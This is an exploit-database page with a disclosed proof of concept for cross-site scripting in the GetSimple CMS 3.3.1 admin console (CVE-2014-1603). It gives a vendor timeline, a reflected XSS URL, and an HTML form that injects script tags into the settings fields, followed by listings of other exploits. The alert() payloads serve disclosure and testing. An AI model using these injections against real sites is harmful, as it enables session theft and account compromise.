Menu

Search for hundreds of thousands of exploits

"GetSimple CMS 3.3.1 - Cross-Site Scripting"

Author

Exploit author

"Pedro Ribeiro"

Platform

Exploit platform

php

Release date

Exploit published date

2014-10-12

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Disclosure: 12/05/2014 / Last updated: 12/10/2014

Timeline:
	04/11/2013 - Found bugs, produced proof of concept.
	05/11/2013 - Communicated to the developer, which acknowledged receipt.
	10/01/2014 - Politely asked the developer for progress, no response.
	17/01/2014 - Received CVE number from MITRE.
	20/01/2014 - Communicated CVE number to the developer, no response.
	29/01/2014 - Politely asked the developer for progress, no response.
	12/05/2014 - Public release.
==============================

Reflected XSS in plugin load page:
	http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>

Persistent XSS in settings page:
	<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
	<input type="text" name="user" value=""><script>alert(1);</script>">
	<input type="text" name="email" value=""><script>alert(2);</script>">
	<input type="text" name="name" value=""><script>alert(3);</script>">
	<input type="hidden" name="submitted" value="Save Settings">
	<input type="submit" value="Submit">
	</form>


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2018-01-22 "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution" remote hardware "Pedro Ribeiro"
2017-03-24 "NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)" remote hardware "Pedro Ribeiro"
2017-01-31 "Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2016-12-21 "NETGEAR WNR2000v5 - Remote Code Execution" remote cgi "Pedro Ribeiro"
2016-08-10 "WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-08-05 "NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities" remote hardware "Pedro Ribeiro"
2016-04-11 "Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-02-04 "NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-09-29 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)" webapps asp "Pedro Ribeiro"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2015-09-28 "BMC Track-It! 11.4 - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2015-07-15 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)" webapps windows "Pedro Ribeiro"
2015-06-10 "SysAid Help Desk 14.4 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-06-10 "ICU library 52 < 54 - Multiple Vulnerabilities" local multiple "Pedro Ribeiro"
2015-04-08 "Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution" webapps jsp "Pedro Ribeiro"
2015-02-09 "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2015-01-18 "Lorex LH300 Series - ActiveX Buffer Overflow (PoC)" dos hardware "Pedro Ribeiro"
2015-01-15 "ManageEngine Desktop Central - Create Administrator" webapps multiple "Pedro Ribeiro"
2014-12-03 "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download" webapps multiple "Pedro Ribeiro"
2014-11-10 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2014-11-10 "Password Manager Pro / Pro MSP - Blind SQL Injection" webapps multiple "Pedro Ribeiro"
2014-11-09 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-11-05 "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)" webapps multiple "Pedro Ribeiro"
2014-10-12 "CMS Made Simple 1.11.9 - Multiple Vulnerabilities" webapps php "Pedro Ribeiro"
2014-10-12 "Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2014-10-12 "GetSimple CMS 3.3.1 - Cross-Site Scripting" webapps php "Pedro Ribeiro"
2014-10-09 "BMC Track-It! - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2014-10-02 "ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)" remote java "Pedro Ribeiro"
2014-09-01 "ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution" webapps jsp "Pedro Ribeiro" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected